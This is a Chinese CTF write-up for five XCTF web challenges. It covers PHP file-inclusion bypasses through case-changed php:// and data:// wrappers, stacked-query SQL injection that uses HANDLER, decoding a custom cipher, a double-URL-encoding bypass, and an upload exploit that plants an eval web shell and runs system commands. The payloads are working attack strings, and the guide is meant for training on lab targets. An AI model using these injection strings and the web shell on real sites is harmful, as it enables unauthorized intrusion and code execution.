攻防世界-web进阶[部分题目wirteup]
1、Web_php_include
源码:
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
考察php文件包含
知识点:
1、strstr()函数,strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。该函数是区分大小写的。如需进行不区分大小写的搜索,请使用 stristr() 函数
2、str_replace()函数,str_replace() 函数替换字符串中的一些字符(区分大小写)
3、利用php伪协议大小写绕过
php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。
?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter
payload:
?page=pHP://input
post:<?php phpinfo();?>
4、data伪协议代码执行
data协议
用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
更多内容可参考:《Web_php_include》
2、supersqli
1' or 1 -- + //--与+之间有空格
1' order by 2 -- + //两个字段
1' union select 1,2 -- + //被函数preg_match替换,preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
1';show databases -- + //堆叠查询数据库,发现supersqli
1';show tables from supersqli;-- + //堆叠查询supersqli中的表,1919810931114514、words
1';show columns from `1919810931114514` -- + //发现flag
1';show columns from `words` -- + //columns:id、data
1';handler `1919810931114514` open;handler `1919810931114514` read first;-- +
那么,我们来看看Handler语法说明:
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name CLOSE
先用handler命令open打开表,再handler…read…读取表中的内容,其中read可以使用first、next遍历,还可以配合limit来遍历
3、web2
源码:
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
function encode($str){
$_o=strrev($str);
// echo $_o;
for($_0=0;$_0<strlen($_o);$_0++){
$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;
}
return str_rot13(strrev(base64_encode($_)));
}
highlight_file(__FILE__);
/*
逆向加密算法,解密$miwen就是flag
*/
?>
str_rot13,ROT13 编码把每一个字母在字母表中向前移动 13 个字母。数字和非字母字符保持不变。
提示:编码和解码都是由相同的函数完成的。如果您把已编码的字符串作为参数,那么将返回原始字符串。
直接修改代码即可获得flag
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$temp=base64_decode(strrev(str_rot13($miwen)));
function decode($str){
$_o=$str;
$_='';
for($_0=0;$_0<strlen($_o);$_0++){
$_c=substr($_o,$_0,1);
$__=ord($_c)-1;
$_c=chr($__);
$_=$_.$_c;
}
return strrev($_);
}
print_r(decode($temp));
?>
4、PHP2
题目的坑点在是否能发现index.phps。
phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。
它的MIME类型为:text/html, application/x-httpd-php-source,
application/x-httpd-php3-source。
源码:
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
admin二次url编码绕过,获得flag
5、upload1
直接上传一张图片,用burpsuite的repeater功能修改后缀为php,再写入代码<?php @eval($_REQUEST[shell]);?>
浏览器访问:
upload/1601886287.1.php?shell=system(“pwd”); /var/www/html/upload
upload/1601886287.1.php?shell=system(“find /var/www/ -name “flag””); /var/www/html/flag.php
upload/1601886287.1.php?shell=system(“cat /var/www/html/flag.php”); flag在源码中
文章如有不正确的地方,请各位交流指正。
3270
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
